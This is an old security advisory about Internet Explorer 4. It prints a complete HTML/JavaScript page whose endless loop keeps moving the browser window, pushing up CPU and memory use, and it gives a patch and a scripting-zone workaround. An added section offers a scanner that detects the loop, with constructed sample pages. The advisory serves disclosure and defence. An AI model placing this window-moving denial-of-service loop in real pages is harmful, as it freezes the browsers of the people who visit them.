COMMAND

    MS Internet Explorer

SYSTEMS AFFECTED

    Systems running IE (Win95, NT)

PROBLEM

    Dan Anatol posted the following.  The code below will make any
    browser "go nuts"; however, if you press Escape (STOP) in Netscape
    4, it stops.  IE 4, however, does not.  CPU usage goes up, memory
    usage goes up, etc.  This was tested with Win95, NT+SP3 4.0
    workstation, and NT 4.0+SP3 Server.  Minimizing won't work either:
    on NT the window unminimizes itself, and on 95 the minimized
    task-bar entry "jumps" around.

    One more interesting thing: Explorer lets you position the window
    outside the screen's range (at a position that's "out" of the
    screen); Netscape doesn't.  (You can also change the minx/miny
    numbers to negative values, and it "works" with IE.)  "Exploit"
    code follows:

    <HTML>
    <!-- Written by: xyster

         email: xyster@writeme.com

         Have fun . . .

     -->
    <HEAD>
    <TITLE>Bounce</TITLE>
    <SCRIPT LANGUAGE="javascript">
    var dx, dy, x, y, minx, miny, maxx, maxy;
    dx = 50;
    dy = 100;
    x = Math.random() * 200;
    y = Math.random() * 200;
    minx = 0;
    maxx = 600;
    miny = 0;
    maxy = 600;
    do {
        window.moveTo(x, y);
        x += dx;
        y += dy;
        if (x <= minx  ||  x >= maxx) dx = -dx;
        if (y <= miny  ||  y >= maxy) dy = -dy;
       } while(1);
    </SCRIPT>
    </HEAD>
    <BODY>
    </BODY>
    </HTML>
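
    The following is an added example, not part of the original
    advisory or of xyster's code: a heuristic scanner that flags inline
    scripts containing an unconditional loop that moves or resizes the
    window with no exit statement, the shape of the page above.  It also
    covers while(1)/for(;;) loops and moveBy/resizeTo/resizeBy; all
    function names and sample pages are constructed for illustration.

```javascript
// Added example, not part of the advisory. Heuristic only: strings and
// comments containing braces are not parsed. All names here are hypothetical.
const WINDOW_CALL = /\b(?:window|self|top)\s*\.\s*(?:moveTo|moveBy|resizeTo|resizeBy)\s*\(/;
const EXIT = /\b(?:break|return|throw)\b/;
const ALWAYS = String.raw`\(\s*(?:1|true)\s*\)`;   // matches (1) or (true)

// Text between the '{' at index `open` and its matching '}', or null.
function blockBody(src, open) {
  let depth = 0;
  for (let i = open; i < src.length; i++) {
    if (src[i] === '{') depth++;
    else if (src[i] === '}' && --depth === 0) return src.slice(open + 1, i);
  }
  return null;
}

// Report unconditional loops in inline scripts that move or resize the
// window and contain no break/return/throw.
function findWindowLoops(html) {
  const hits = [];
  const scripts = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
  const loops = new RegExp(String.raw`\b(?:(do)|while\s*${ALWAYS}|for\s*\(\s*;\s*;\s*\))\s*\{`, 'g');
  const doTail = new RegExp(String.raw`^\s*while\s*${ALWAYS}`);
  for (const [, src] of html.matchAll(scripts)) {
    for (const m of src.matchAll(loops)) {
      const open = m.index + m[0].length - 1;      // index of the loop's '{'
      const body = blockBody(src, open);
      if (body === null || !WINDOW_CALL.test(body) || EXIT.test(body)) continue;
      // A do { ... } block is unconditional only if while(1) follows it.
      if (m[1] && !doTail.test(src.slice(open + body.length + 2))) continue;
      hits.push(m[1] ? 'do-while' : 'while/for');
    }
  }
  return hits;
}

// Constructed samples: the advisory's loop shape, and a bounded animation.
const SAMPLE_LOOP = '<HTML><HEAD><SCRIPT LANGUAGE="javascript">\n' +
  'var x = 0, dx = 50;\n' +
  'do { window.moveTo(x, 0); x += dx; if (x <= 0 || x >= 600) dx = -dx; } while(1);\n' +
  '</SCRIPT></HEAD></HTML>';
const SAMPLE_BOUNDED = '<html><script>\n' +
  'for (var i = 0; i < 10; i++) { window.moveBy(5, 0); }\n' +
  'do { step(); } while (1);\n' +
  '</script></html>';

console.log(findWindowLoops(SAMPLE_LOOP), findWindowLoops(SAMPLE_BOUNDED));
```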

SOLUTION

    On August 17th Microsoft released a patch that fixes the problem
    as reported.  This patch is available for download from the
    Microsoft Scripting Technologies web site:

        http://www.microsoft.com/msdownload/vbscript/scripting.asp

    Microsoft has also made this patch available as a "Critical
    Update" for Windows 98 customers through Windows Update.
    Localized versions of the patch are available from the Microsoft
    Scripting Technologies web site:

        http://www.microsoft.com/msdownload/vbscript/scripting.asp

    MS strongly encourages customers to apply the patch.  However,
    users who cannot apply the patch can use the Zones security
    feature in Internet Explorer to provide additional protection
    against this issue by disabling Active Scripting in the "Internet"
    and "Restricted Sites" Zones.  This would still allow JScript to be
    run from trusted Internet sites, and on the user's local intranet.
    To turn off Active Scripting for the "Internet" Zone:

        1. From Internet Explorer, choose "Internet Options" from the
           "View" menu.
        2. Click on the tab labeled "Security".
        3. Click on "Internet Zone", then click "Customize Settings".
        4. Scroll to the bottom of the list and click on "Disable"
           under the "Active Scripting" setting.

    These same procedures can be followed for the "Restricted Sites"
    Zone.